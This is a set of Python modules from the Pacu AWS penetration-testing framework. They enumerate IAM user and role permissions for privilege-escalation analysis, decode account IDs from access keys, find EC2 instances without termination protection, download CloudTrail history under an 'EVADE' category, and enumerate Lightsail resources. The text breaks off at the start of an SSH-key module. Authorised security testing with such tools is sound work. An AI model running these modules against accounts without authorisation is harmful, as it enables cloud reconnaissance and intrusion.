#!/usr/bin/env python3
import argparse
import json
import re

from botocore.exceptions import ClientError
from policyuniverse.statement import Statement

from pacu.core.lib import strip_lines, save, downloads_dir
from pacu import Main


module_info = {
    "name": "iam__enum_permissions",
    "author": "Spencer Gietzen of Rhino Security Labs",
    "category": "ENUM",
    "one_liner": "Tries to get a confirmed list of permissions for the current (or all) user(s).",
    "description": strip_lines(
        """
        This module will attempt to use IAM APIs to enumerate a confirmed list of IAM permissions for users/roles in the
        account. By default, the owner of the active set of keys is targeted. This is done by checking attached and
        inline policies for the user and the groups they are in.
    """
    ),
    "services": ["IAM"],
    "prerequisite_modules": ["iam__enum_users_roles_policies_groups"],
    "arguments_to_autocomplete": ["--all-users", "--user-name"],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info["description"])

parser.add_argument(
    "--all-users",
    required=False,
    default=False,
    action="store_true",
    help=strip_lines(
        """
    Run this module against every user in the account and store the results to 
    ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/user-[user_name].json. This data
    can then be run against the iam__privesc_scan module with the --offline flag enabled.
"""
    ),
)
parser.add_argument(
    "--user-name",
    required=False,
    default=None,
    help=strip_lines(
        """
    A single user name of a user to run this module against. By default, the active AWS keys will be used.
"""
    ),
)
parser.add_argument(
    "--all-roles",
    required=False,
    default=False,
    action="store_true",
    help=strip_lines(
        """
    Run this module against every role in the account and store the results to
    ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/role-[role_name].json. This data
    can then be run against the iam__privesc_scan module with the --offline flag enabled.
"""
    ),
)
parser.add_argument(
    "--role-name",
    required=False,
    default=None,
    help=strip_lines(
        """
    A single role name of a role to run this module against. By default, the active AWS keys will be used.
"""
    ),
)


def main(args, pacu_main: "Main"):
    session = pacu_main.get_active_session()

    # Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print

    key_info = pacu_main.key_info
    fetch_data = pacu_main.fetch_data
    # End don't modify

    summary_data = {"users_confirmed": 0, "roles_confirmed": 0}

    users = []
    roles = []

    if args.all_users is True:
        if (
            fetch_data(
                ["IAM", "Users"], module_info["prerequisite_modules"][0], "--users"
            )
            is False
        ):
            print("FAILURE")
            print("  SUB-MODULE EXECUTION FAILED")
            return
        fetched_users = session.IAM["Users"]
        for user in fetched_users:
            users.append(
                {
                    "UserName": user["UserName"],
                    "PermissionsConfirmed": True,
                    "Permissions": {"Allow": {}, "Deny": {}},
                }
            )
    elif args.user_name is not None:
        users.append(
            {
                "UserName": args.user_name,
                "PermissionsConfirmed": True,
                "Permissions": {"Allow": {}, "Deny": {}},
            }
        )
        summary_data["single_user"] = args.user_name

    if args.all_roles is True:
        if (
            fetch_data(
                ["IAM", "Roles"], module_info["prerequisite_modules"][0], "--roles"
            )
            is False
        ):
            print("FAILURE")
            print("  SUB-MODULE EXECUTION FAILED")
            return
        fetched_roles = session.IAM["Roles"]
        for role in fetched_roles:
            roles.append(
                {
                    "RoleName": role["RoleName"],
                    "PermissionsConfirmed": True,
                    "Permissions": {"Allow": {}, "Deny": {}},
                }
            )
    elif args.role_name is not None:
        roles.append(
            {
                "RoleName": args.role_name,
                "PermissionsConfirmed": True,
                "Permissions": {"Allow": {}, "Deny": {}},
            }
        )
        summary_data["single_role"] = args.role_name

    is_user = is_role = False

    if not any([args.all_users, args.user_name, args.all_roles, args.role_name]):
        client = pacu_main.get_boto3_client("sts")
        identity = client.get_caller_identity()
        active_aws_key = session.get_active_aws_key(pacu_main.database)

        if re.match(r"arn:aws:iam::\d{12}:user/", identity["Arn"]) is not None:
            is_user = True
            # GetCallerIdentity away return user's ARN like this if it was a user
            # arn:aws:iam::123456789012:user/username
            username = identity["Arn"].split(":user/")[1]
            active_aws_key.update(
                pacu_main.database,
                user_name=username.split("/")[-1],
                arn=identity["Arn"],
                user_id=identity["UserId"],
                account_id=identity["Account"],
            )
        elif (
            re.match(r"arn:aws:sts::\d{12}:assumed-role/", identity["Arn"]) is not None
        ):
            is_role = True
            active_aws_key.update(
                pacu_main.database,
                role_name=identity["Arn"].split(":assumed-role/")[1].split("/")[-2],
                arn=identity["Arn"],
                user_id=identity["UserId"],
                account_id=identity["Account"],
            )
        else:
            print("Not an IAM user or role. Exiting...\n")
            return False

        if is_user:
            user = key_info(alias=session.key_alias)
            user["PermissionsConfirmed"] = True
            user["Permissions"] = {"Allow": {}, "Deny": {}}
            users.append(user)
            summary_data["single_user"] = user["UserName"]
        elif is_role:
            roles.append(
                {
                    "RoleName": active_aws_key.role_name,
                    "PermissionsConfirmed": True,
                    "Permissions": {"Allow": {}, "Deny": {}},
                }
            )
            summary_data["single_role"] = active_aws_key.role_name

    # list-groups-for-user
    # list-user-policies
    # list-group-policies
    # list-role-policies
    # list-attached-role-policies
    # list-attached-group-policies
    # list-attached-user-policies
    # get-policy
    # get-policy-version
    # get-user-policy
    # get-group-policy
    # get-role-policy

    client = pacu_main.get_boto3_client("iam")
    if any([args.all_users, args.user_name, args.all_roles, args.role_name]):
        print("Permission Document Location:")
        print("  {}/confirmed_permissions/\n".format(downloads_dir()))

    if roles:
        print("Confirming permissions for roles:")
        for role in roles:
            print("  {}...".format(role["RoleName"]))
            role["Policies"] = []

            try:
                # Get inline role policies
                policies = []
                try:
                    response = client.list_role_policies(RoleName=role["RoleName"])
                    policies = response["PolicyNames"]
                    while "IsTruncated" in response and response["IsTruncated"] is True:
                        response = client.list_role_policies(
                            RoleName=role["RoleName"], Marker=response["Marker"]
                        )
                        policies += response["PolicyNames"]
                    for policy in policies:
                        role["Policies"].append({"PolicyName": policy})
                except ClientError as error:
                    print("    List role policies failed")
                    if error.response["Error"]["Code"] == "AccessDenied":
                        print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                    else:
                        print("      {}".format(error.response["Error"]["Code"]))
                    role["PermissionsConfirmed"] = False

                # Get document for each inline policy
                for policy in policies:
                    try:
                        document = client.get_role_policy(
                            RoleName=role["RoleName"], PolicyName=policy
                        )["PolicyDocument"]
                    except ClientError as error:
                        print("    Get role policy failed")
                        if error.response["Error"]["Code"] == "AccessDenied":
                            print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                        else:
                            print("      {}".format(error.response["Error"]["Code"]))
                        role["PermissionsConfirmed"] = False
                    role = parse_document(document, role)

                # Get attached role policies
                attached_policies = []
                try:
                    response = client.list_attached_role_policies(
                        RoleName=role["RoleName"]
                    )
                    attached_policies = response["AttachedPolicies"]
                    while "IsTruncated" in response and response["IsTruncated"] is True:
                        response = client.list_attached_role_policies(
                            RoleName=role["RoleName"], Marker=response["Marker"]
                        )
                        attached_policies += response["AttachedPolicies"]
                    role["Policies"] += attached_policies
                except ClientError as error:
                    print("    List attached role policies failed")
                    if error.response["Error"]["Code"] == "AccessDenied":
                        print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                    else:
                        print("      {}".format(error.response["Error"]["Code"]))
                    role["PermissionsConfirmed"] = False

                role = parse_attached_policies(client, attached_policies, role)
                if role["PermissionsConfirmed"]:
                    summary_data["roles_confirmed"] += 1

                if args.role_name is None and args.all_roles is False:
                    print("    Confirmed permissions for {}".format(role["RoleName"]))
                    active_aws_key.update(
                        pacu_main.database,
                        role_name=role["RoleName"],
                        policies=role["Policies"],
                        permissions_confirmed=role["PermissionsConfirmed"],
                        allow_permissions=role["Permissions"]["Allow"],
                        deny_permissions=role["Permissions"]["Deny"],
                    )
                else:
                    with save(
                        "confirmed_permissions/role-{}.json".format(role["RoleName"]),
                        "w+",
                    ) as f:
                        json.dump(role, f, indent=2, default=str)

                    print(
                        "    Permissions stored in role-{}.json".format(
                            role["RoleName"]
                        )
                    )
            except ClientError as error:
                if error.response["Error"]["Code"] == "AccessDenied":
                    print("  FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                else:
                    print("  {}".format(error.response["Error"]["Code"]))
                print("Skipping {}".format(role["RoleName"]))
        if users:
            print()

    if users:
        print("Confirming permissions for users:")
        for user in users:
            print("  {}...".format(user["UserName"]))
            user["Groups"] = []
            user["Policies"] = []
            try:
                policies = []

                # Get groups that the user is in
                try:
                    response = client.list_groups_for_user(UserName=user["UserName"])
                    user["Groups"] = response["Groups"]
                    while "IsTruncated" in response and response["IsTruncated"] is True:
                        response = client.list_groups_for_user(
                            UserName=user["UserName"], Marker=response["Marker"]
                        )
                        user["Groups"] += response["Groups"]
                except ClientError as error:
                    print("    List groups for user failed")
                    if error.response["Error"]["Code"] == "AccessDenied":
                        print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                    else:
                        print("      {}".format(error.response["Error"]["Code"]))
                    user["PermissionsConfirmed"] = False

                # Get inline and attached group policies
                for group in user["Groups"]:
                    group["Policies"] = []
                    # Get inline group policies
                    try:
                        response = client.list_group_policies(
                            GroupName=group["GroupName"]
                        )
                        policies = response["PolicyNames"]
                        while (
                            "IsTruncated" in response
                            and response["IsTruncated"] is True
                        ):
                            response = client.list_group_policies(
                                GroupName=group["GroupName"], Marker=response["Marker"]
                            )
                            policies += response["PolicyNames"]
                    except ClientError as error:
                        print("     List group policies failed")
                        if error.response["Error"]["Code"] == "AccessDenied":
                            print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                        else:
                            print("      {}".format(error.response["Error"]["Code"]))
                        user["PermissionsConfirmed"] = False

                    # Get document for each inline policy
                    for policy in policies:
                        group["Policies"].append(
                            {  # Add policies to list of policies for this group
                                "PolicyName": policy
                            }
                        )
                        try:
                            document = client.get_group_policy(
                                GroupName=group["GroupName"], PolicyName=policy
                            )["PolicyDocument"]
                        except ClientError as error:
                            print("     Get group policy failed")
                            if error.response["Error"]["Code"] == "AccessDenied":
                                print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                            else:
                                print(
                                    "      {}".format(error.response["Error"]["Code"])
                                )
                            user["PermissionsConfirmed"] = False
                        user = parse_document(document, user)

                    # Get attached group policies
                    attached_policies = []
                    try:
                        response = client.list_attached_group_policies(
                            GroupName=group["GroupName"]
                        )
                        attached_policies = response["AttachedPolicies"]
                        while (
                            "IsTruncated" in response
                            and response["IsTruncated"] is True
                        ):
                            response = client.list_attached_group_policies(
                                GroupName=group["GroupName"], Marker=response["Marker"]
                            )
                            attached_policies += response["AttachedPolicies"]
                        group["Policies"] += attached_policies
                    except ClientError as error:
                        print("    List attached group policies failed")
                        if error.response["Error"]["Code"] == "AccessDenied":
                            print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                        else:
                            print("      {}".format(error.response["Error"]["Code"]))
                        user["PermissionsConfirmed"] = False
                    user = parse_attached_policies(client, attached_policies, user)

                # Get inline user policies
                policies = []
                if "Policies" not in user:
                    user["Policies"] = []
                try:
                    response = client.list_user_policies(UserName=user["UserName"])
                    policies = response["PolicyNames"]
                    while "IsTruncated" in response and response["IsTruncated"] is True:
                        response = client.list_user_policies(
                            UserName=user["UserName"], Marker=response["Marker"]
                        )
                        policies += response["PolicyNames"]
                    for policy in policies:
                        user["Policies"].append({"PolicyName": policy})
                except ClientError as error:
                    print("    List user policies failed")
                    if error.response["Error"]["Code"] == "AccessDenied":
                        print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                    else:
                        print("      {}".format(error.response["Error"]["Code"]))
                    user["PermissionsConfirmed"] = False

                # Get document for each inline policy
                for policy in policies:
                    try:
                        document = client.get_user_policy(
                            UserName=user["UserName"], PolicyName=policy
                        )["PolicyDocument"]
                    except ClientError as error:
                        print("    Get user policy failed")
                        if error.response["Error"]["Code"] == "AccessDenied":
                            print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                        else:
                            print("      {}".format(error.response["Error"]["Code"]))
                        user["PermissionsConfirmed"] = False
                    user = parse_document(document, user)

                # Get attached user policies
                attached_policies = []
                try:
                    response = client.list_attached_user_policies(
                        UserName=user["UserName"]
                    )
                    attached_policies = response["AttachedPolicies"]
                    while "IsTruncated" in response and response["IsTruncated"] is True:
                        response = client.list_attached_user_policies(
                            UserName=user["UserName"], Marker=response["Marker"]
                        )
                        attached_policies += response["AttachedPolicies"]
                    user["Policies"] += attached_policies
                except ClientError as error:
                    print("    List attached user policies failed")
                    if error.response["Error"]["Code"] == "AccessDenied":
                        print("      FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                    else:
                        print("      {}".format(error.response["Error"]["Code"]))
                    user["PermissionsConfirmed"] = False

                user = parse_attached_policies(client, attached_policies, user)
                if user["PermissionsConfirmed"]:
                    summary_data["users_confirmed"] += 1

                if args.user_name is None and args.all_users is False:
                    print("    Confirmed Permissions for {}".format(user["UserName"]))
                    active_aws_key.update(
                        pacu_main.database,
                        user_name=user["UserName"],
                        arn=user["Arn"],
                        user_id=user["UserId"],
                        groups=user["Groups"],
                        policies=user["Policies"],
                        permissions_confirmed=user["PermissionsConfirmed"],
                        allow_permissions=user["Permissions"]["Allow"],
                        deny_permissions=user["Permissions"]["Deny"],
                    )
                else:
                    with save(
                        "confirmed_permissions/user-{}.json".format(user["UserName"]),
                        "w+",
                    ) as f:
                        json.dump(user, f, indent=2, default=str)

                    print(
                        "    Permissions stored in user-{}.json".format(
                            user["UserName"]
                        )
                    )
            except ClientError as error:
                if error.response["Error"]["Code"] == "AccessDenied":
                    print("  FAILURE: MISSING REQUIRED AWS PERMISSIONS")
                else:
                    print("  {}".format(error.response["Error"]["Code"]))
                print("Skipping {}".format(user["UserName"]))

    return summary_data


def summary(data, pacu_main):
    out = ""
    if not data:
        return "  Unable to find users/roles to enumerate permissions\n"
    if data["users_confirmed"] == 1 and data.get("single_user"):
        out += "  Confirmed permissions for user: {}.\n".format(data["single_user"])
    else:
        out += "  Confirmed permissions for {} user(s).\n".format(
            data["users_confirmed"]
        )

    if data["roles_confirmed"] == 1:
        out += "  Confirmed permissions for role: {}.\n".format(data["single_role"])
    else:
        out += "  Confirmed permissions for {} role(s).\n".format(
            data["roles_confirmed"]
        )
    return out


def parse_attached_policies(client, attached_policies, user):
    """Pull permissions from each policy document."""
    for policy in attached_policies:
        document = get_attached_policy(client, policy["PolicyArn"])
        if document is False:
            user["PermissionsConfirmed"] = False
        else:
            user = parse_document(document, user)
    return user


def get_attached_policy(client, policy_arn):
    """Get the policy document of an attached policy."""
    try:
        policy = client.get_policy(PolicyArn=policy_arn)["Policy"]
        version = policy["DefaultVersionId"]
        can_get = True
    except Exception as error:
        print("Get policy failed: {}".format(error))
        return False

        # NOTE: If v1, v2, and v3 exist, then v2 is deleted, the next version will be v4 still, so this WILL error currently
        # print('Attempting to enumerate the default version...')
        # can_get = False

    try:
        if can_get is True:
            document = client.get_policy_version(
                PolicyArn=policy_arn, VersionId=version
            )["PolicyVersion"]["Document"]
            return document

        # else:  # If the user can't run get_policy, try to run get_policy_version to enumerate the default version
        #     for version in ['v1', 'v2', 'v3', 'v4', 'v5']:  # This won't error because it will return the default version before fetching a non-existent version
        #         policy_version = client.get_policy_version(
        #             PolicyArn=policy_arn,
        #             VersionId=version
        #         )['PolicyVersion']
        #         if policy_version['IsDefaultVersion'] is True:
        #             return policy_version['Document']

    except Exception as error:
        print("Get policy version failed: {}".format(error))
        return False


def parse_document(document, user):
    """Loop permissions, resources, and conditions"""
    if isinstance(document["Statement"], dict) or isinstance(document["Statement"], str):
        document["Statement"] = [document["Statement"]]
    statement_actions = get_resources_for_actions_from_statements(document["Statement"])

    for action in statement_actions:
        if statement_actions[action]["Allow_resources"]:
            if user["Permissions"]["Allow"].get(action) is None:
                user["Permissions"]["Allow"][action] = {
                    "Resources": [],
                    "Conditions": [],
                }
            user["Permissions"]["Allow"][action]["Resources"] += statement_actions[
                action
            ]["Allow_resources"]
        if statement_actions[action]["Allow_conditions"]:
            user["Permissions"]["Allow"][action]["Conditions"] += statement_actions[
                action
            ]["Allow_conditions"]
        if statement_actions[action]["Deny_resources"]:
            if user["Permissions"]["Deny"].get(action) is None:
                user["Permissions"]["Deny"][action] = {
                    "Resources": [],
                    "Conditions": [],
                }
            user["Permissions"]["Deny"][action]["Resources"] += statement_actions[
                action
            ]["Deny_resources"]
        if statement_actions[action]["Deny_conditions"]:
            user["Permissions"]["Deny"][action]["Conditions"] += statement_actions[
                action
            ]["Deny_conditions"]

    return user


def get_resources_for_actions_from_statements(list_of_statements):
    """
    Gets the denied and allowed resources with conditions for a given actions query
    from a list of policy statements
    Args: list_of_statements (list): list of statement JSON objects from a policy
    returns: dict: a dictionary of actions with the following structure:

    {

        "someAction": {
            "Deny_resources": set(),
            "Deny_conditions": [],
            "Allow_resources": set(),
            "Allow_conditions": []
        },
        "someOtherAction": {
            "Deny_resources": set(),
            "Deny_conditions": [],
            "Allow_resources": set(),
            "Allow_conditions": []
        }

    }
    """

    class ExtendedStatement(Statement):
        """
        Extends the Statement class to add the notresources and conditions properties
        """

        @property
        def notresources(self):
            # If the statement has NotResource, add a notresources attribute to the PU statement object
            if "NotResource" in self.statement:
                if isinstance(self.statement.get("NotResource"), str):
                    return set([self.statement.get("NotResource")])
                return set(self.statement.get("NotResource"))
            else:
                return set()

        @property
        def conditions(self):
            # Add a conditions attribute to the PU statement object
            return self.statement.get("Condition") or {}

    results = {}

    def new_action_dict():
        # returns a new action dictionary
        return {
            "Deny_resources": set(),
            "Deny_conditions": [],
            "Allow_resources": set(),
            "Allow_conditions": [],
        }

    for st in list_of_statements:
        try:
            statement = ExtendedStatement(st)
        except Exception as e:
            print(e)
            print("[!] Error parsing statement")
            continue

        # iterate through expanded actions
        for action in statement.actions_expanded:
            effect_key = statement.effect

            # Set the action dictionary to the results dictionary if it exists
            # otherwise create a new action dictionary
            action_dict = results.get(action, new_action_dict())

            # Add resources to the Deny_resources set if there is a notresources and effect is Allow
            if statement.notresources and statement.effect == "Allow":
                updated_resources = action_dict["Deny_resources"].union(
                    statement.notresources
                )
                action_dict.update({"Deny_resources": updated_resources})

            if statement.notresources and statement.effect == "Deny":
                # Add a condition in this case since it means access is denied
                # but does not mean any other access is allowed
                # TODO maybe a better way to do this but for now here we are.
                action_dict["Deny_conditions"].append(
                    {"IfResourcesNotIn": statement.notresources}
                )

            if statement.notresources and statement.effect == "Allow":
                # Add a condition in this case since it means access is allowed
                # to everything except the notresources
                # TODO maybe a better way to do this but for now here we are.
                action_dict["Allow_conditions"].append(
                    {"IfResourcesNotIn": statement.notresources}
                )

            # Update the Allow or Deny resources
            updated_resources = action_dict[f"{effect_key}_resources"].union(
                statement.resources
            )
            action_dict.update({f"{effect_key}_resources": updated_resources})

            # Add conditions if any exist
            if statement.conditions:
                action_dict[f"{effect_key}_conditions"].append(statement.conditions)

            # Update the results for the actions
            results[action] = action_dict

    return results



import signal
import sys
import typing
import zipfile
import base64
import binascii
import re
from pathlib import Path
from typing import Optional, Union

from sqlalchemy import create_engine, orm
from sqlalchemy.orm import sessionmaker

from pacu.core.base import DATABASE_CONNECTION_PATH
from datetime import datetime


def get_database_connection(database_connection_path: str=DATABASE_CONNECTION_PATH) -> orm.session.Session:
    """ Unlike database file paths, database connection paths must begin with
    sqlite:/// """
    assert database_connection_path.startswith('sqlite:///'), 'Database connection path must start with sqlite:///'

    engine = create_engine(database_connection_path)
    Session = sessionmaker(bind=engine)

    return Session()

def remove_empty_from_dict(d: Union[dict, list, typing.Any]) -> Union[dict, list, typing.Any]:
    """ Reference: https://stackoverflow.com/a/24893252 """
    if type(d) is dict:
        d = typing.cast(dict, d)
        return dict((k, remove_empty_from_dict(v)) for k, v in d.items() if v and remove_empty_from_dict(v))

    elif type(d) is list:
        d = typing.cast(list, d)
        return [remove_empty_from_dict(v) for v in d if v and remove_empty_from_dict(v)]

    else:
        return d


def stringify(obj: Union[dict, list, datetime]) -> Union[dict, list, str]:
    """ The sqlalchemy-utils' JSONType doesn't accept Python datetime objects.
    This method converts all datetime objects in JSONizable data structures
    into strings, allowing the ORM to save them. """

    if isinstance(obj, dict):
        # If obj is a dict, iterate over its items and recusrively call
        # stringify on each of them.
        new_dict = dict()
        for k, v in obj.items():
            new_dict[k] = stringify(v)
        return new_dict

    elif isinstance(obj, list):
        # If obj is a list, iterate over its elements and recusrively call
        # stringify on each of them.
        new_list = list()
        for v in obj:
            new_list.append(stringify(v))
        return new_list

    elif isinstance(obj, datetime):
        # If obj is a datetime, return a formatted string version of it
        return str(obj.strftime("%a, %d %b %Y %H:%M:%S"))

    elif isinstance(obj, bytes):
        # If obj is bytes, return a formatted string version of it
        return obj.decode()

    else:
        return obj


def set_sigint_handler(exit_text: Optional[str]=None, value: Union[str, int]=0) -> None:

    def sigint_handler(signum, frame):
        """ This is to stop the error printed when CTRL+Cing out of the program
        so it can exit gracefully. """
        if exit_text is not None:
            print(exit_text)

        sys.exit(value)

    signal.signal(signal.SIGINT, sigint_handler)


def zip_file(file_path: Path, file_data: dict) -> bytes:
    '''
    file_data structure
    {
        'file_name_1': 'some_text_data',
        'file_name_2': 'some_text_data'
    }
    '''
    with zipfile.ZipFile(file_path, 'w', zipfile.ZIP_DEFLATED) as zf:
        for file_name in file_data.keys():
            zf.writestr(file_name, file_data[file_name])

    with open(file_path, 'rb') as f:
        return f.read()


def decode_accesskey_id(AWSKeyID):
    '''
    Taken from: https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489
    AWSKeyID is the AWS Access Key ID
    This function returns the AWS Account ID
    '''
    regex = re.compile('(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])')
    if not regex.match(AWSKeyID):
        print('Invalid AWS Access Key ID')
        return

    trimmed_AWSKeyID = AWSKeyID[4:]
    x = base64.b32decode(trimmed_AWSKeyID)
    y = x[0:6]

    z = int.from_bytes(y, byteorder='big', signed=False)
    mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)

    e = (z & mask) >> 7
    return ("{:012d}".format(e))



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
from copy import deepcopy
import time

from pacu.core.lib import strip_lines, save
from pacu import Main

module_info = {
    'name': 'ec2__check_termination_protection',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'ENUM',
    'one_liner': 'Collects a list of EC2 instances without termination protection.',
    'description': strip_lines('''
        This module will check to see if EC2 instance termination protection is enabled for a set of instances. By 
        default, this module will run against all instances. All instances with termination protection disabled will be 
        written to a file at ~/.local/share/pacu/sessions/[current_session_name]/downloads/termination_protection_disabled_[timestamp].csv
        in .CSV format.
    '''),
    'services': ['EC2'],
    'prerequisite_modules': ['ec2__enum'],
    'arguments_to_autocomplete': ['--instances'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--instances', required=False, default=None, help=strip_lines('''
    A comma separated list of EC2 instances and their regions in the format instanceid@region. The default is to target 
    all instances.
'''))


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print

    fetch_data = pacu_main.fetch_data
    ######
    summary_data = {'instance_count': 0}
    # fetch_data is used when there is a prerequisite module to the current module. The example below shows how to fetch
    # all EC2 security group data to use in this module.
    if fetch_data(['EC2', 'Instances'], module_info['prerequisite_modules'][0], '--instances') is False:
        print('Pre-req module not run successfully. Exiting...')
        return summary_data
    instances = session.EC2['Instances']

    now = time.time()
    p = 'termination_protection_disabled_{}.csv'.format(session.name, now)
    summary_data['csv_file_path'] = p
    with save(p, 'w+') as f:
        f.write('Instance Name,Instance ID,Region\n')
        for instance in instances:
            client = pacu_main.get_boto3_client('ec2', instance['Region'])

            try:
                instance['TerminationProtection'] = client.describe_instance_attribute(
                    Attribute='disableApiTermination',
                    InstanceId=instance['InstanceId']
                )['DisableApiTermination']['Value']
                if instance['TerminationProtection'] is False:
                    name = ''
                    if 'Tags' in instance:
                        for tag in instance['Tags']:
                            if tag['Key'] == 'Name':
                                name = tag['Value']
                                break
                    f.write('{},{},{}\n'.format(name, instance['InstanceId'], instance['Region']))
                    summary_data['instance_count'] += 1
            except ClientError as error:
                code = error.response['Error']['Code']
                print('FAILURE: ')
                if code == 'UnauthorizedOperation':
                    print('  Access denied to DescribeInstanceAttribute.')
                    break
                else:
                    print('  ' + code)
                print('Failed to retrieve info for instance ID {}: {}'.format(instance['InstanceId'], error))

    ec2_data = deepcopy(session.EC2)
    ec2_data['Instances'] = instances
    session.update(pacu_main.database, EC2=ec2_data)
    return summary_data


def summary(data, pacu_main):
    out = '  {} instances have termination protection disabled\n'.format(data['instance_count'])
    if data['instance_count'] > 0:
        out += '  Identified instances have been written to:\n'
        out += '     {}\n'.format(data['csv_file_path'])
    return out



#!/usr/bin/env python3
import argparse
import json
import time

from pacu.core.lib import strip_lines, save, downloads_dir
from pacu import Main

module_info = {
    'name': 'cloudtrail__download_event_history',
    'author': 'Spencer Gietzen of Rhino Security Labs',
    'category': 'EVADE',
    'one_liner': 'Downloads CloudTrail event history to JSON files.',
    'description': strip_lines('''
        This module will download the CloudTrail event history for each specified region in both JSON format to 
        ~/.local/share/pacu/sessions/[current_session_name]/downloads/cloudtrail_[region]_event_history_[timestamp].json.
        Warning: This module can take a very long time to complete because the maximum events per API call is 50, when 
        there could be tens or hundreds of thousands or more total events to download. A rough estimate is about 10000
        events retrieved per five minutes.
    '''),
    'services': ['CloudTrail'],
    'prerequisite_modules': [],
    'arguments_to_autocomplete': ['--regions'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])

parser.add_argument('--regions', required=False, default=None, help='One or more (comma separated) AWS regions in the format "us-east-1". Defaults to all session regions.')


def main(args, pacu_main: 'Main'):
    session = pacu_main.get_active_session()

    ###### Don't modify these. They can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print

    get_regions = pacu_main.get_regions
    ######
    summary_data = {}
    if args.regions is None:
        regions = get_regions('cloudtrail')
        if regions is None or regions == [] or regions == '' or regions == {}:
            print('This module is not supported in any regions specified in the current sessions region set. Exiting...')
            return
    else:
        regions = args.regions.split(',')

    for region in regions:
        events = []
        print('Downloading logs from {}:'.format(region))
        print(' This may take a while...')
        client = pacu_main.get_boto3_client('cloudtrail', region)

        event_history = client.lookup_events(
            MaxResults=50,
        )
        events += event_history['Events']

        while 'NextToken' in event_history:
            print('  Processing additional results...')
            event_history = client.lookup_events(
                MaxResults=50,
                NextToken=event_history['NextToken']
            )
            events += event_history['Events']

        summary_data[region] = len(events)
        print('Finished enumerating {}'.format(region))

        now = time.time()
        filename = 'cloudtrail_{}_event_history_{}.json'.format(region, now)
        with save(filename) as f:
            json.dump(events, f, indent=2, default=str)
        print('  Events written to {}/cloudtrail_{}_event_history_{}.json'.format(downloads_dir(), region, now))

    return summary_data


def summary(data, pacu_main):
    out = ''
    for region in data:
        out += '  {} Event(s) found for {}.\n'.format(data[region], region)
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError

MASTER_FIELDS = [
    'active-names',
    'blueprints',
    'bundles',
    'instances',
    'key-pairs',
    'operations',
    'static-ips',
    'disks',
    'disk-snapshots',
    'load-balancers'
]

module_info = {
    'name': 'lightsail__enum',
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',
    'category': 'ENUM',
    'one_liner': 'Captures common data associated with Lightsail',
    'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
    'services': ['Lightsail'],
    'external_dependencies': [],
    'arguments_to_autocomplete': ['--' + field for field in MASTER_FIELDS],
}


def add_field(name: str) -> None:
    parser.add_argument(
        '--' + name,
        required=False,
        default=False,
        action='store_true',
        help='Enumerate Lightsail ' + name.replace('-', ' ')
    )


parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
for field in MASTER_FIELDS:
    add_field(field)


def setup_storage(fields):
    out = {}
    for field in fields:
        out[field] = []
    return out


# Converts snake_case to camelcase.
def camelCase(name):
    splitted = name.split('_')
    out = splitted[0]
    for word in splitted[1:]:
        out += word[0].upper() + word[1:]
    return out


def fetch_lightsail_data(client, func, print):
    # Adding 'get_' portion to each field to build command.
    caller = getattr(client, 'get_' + func)
    try:
        response = caller()
        data = response[camelCase(func)]
        while 'nextPageToken' in response:
            response = caller(pageToken=response['nextPageToken'])
            data.extend(response[camelCase(func)])
        print('    Found {} {}'.format(len(data), func))
        if func != 'active_names':
            for resource in data:
                resource['region'] = client.meta.region_name
        return data
    except ClientError as error:
        if error.response['Error']['Code'] == 'AccessDeniedException':
            print('  {}'.format(func))
            print('    FAILURE: MISSING REQUIRED AWS PERMISSIONS')
        else:
            print('Unknown Error:\n{}'.format(error))
    return []


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    get_regions = pacu_main.get_regions

    fields = [arg for arg in vars(args) if getattr(args, arg)]
    if not fields:
        # Converts kebab-case to snake_case to match expected Boto3 function names.
        fields = [field.replace('-', '_') for field in MASTER_FIELDS]

    lightsail_data = setup_storage(fields)
    regions = get_regions('lightsail')

    for region in regions:
        print('Starting region {}...'.format(region))
        client = pacu_main.get_boto3_client('lightsail', region)
        for field in fields:
            lightsail_data[field].extend(fetch_lightsail_data(client, field, print))

    summary_data = {'regions': regions}
    for field in lightsail_data:
        summary_data[field] = len(lightsail_data[field])

    session.update(pacu_main.database, Lightsail=lightsail_data)
    return summary_data


def summary(data, pacu_main):
    out = '  Regions Enumerated:\n'
    for region in data['regions']:
        out += '    {}\n'.format(region)
    del data['regions']
    for field in data:
        out += '  {} {} enumerated\n'.format(data[field], field[:-1] + '(s)')
    return out



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import os

from pacu.core.lib import downloads_dir
from pacu import Main

module_info = {
    # Name of the module (should be the same as the filename)
    'name': 'lightsail__generate_ssh_keys',

    # Name and any other notes about the author
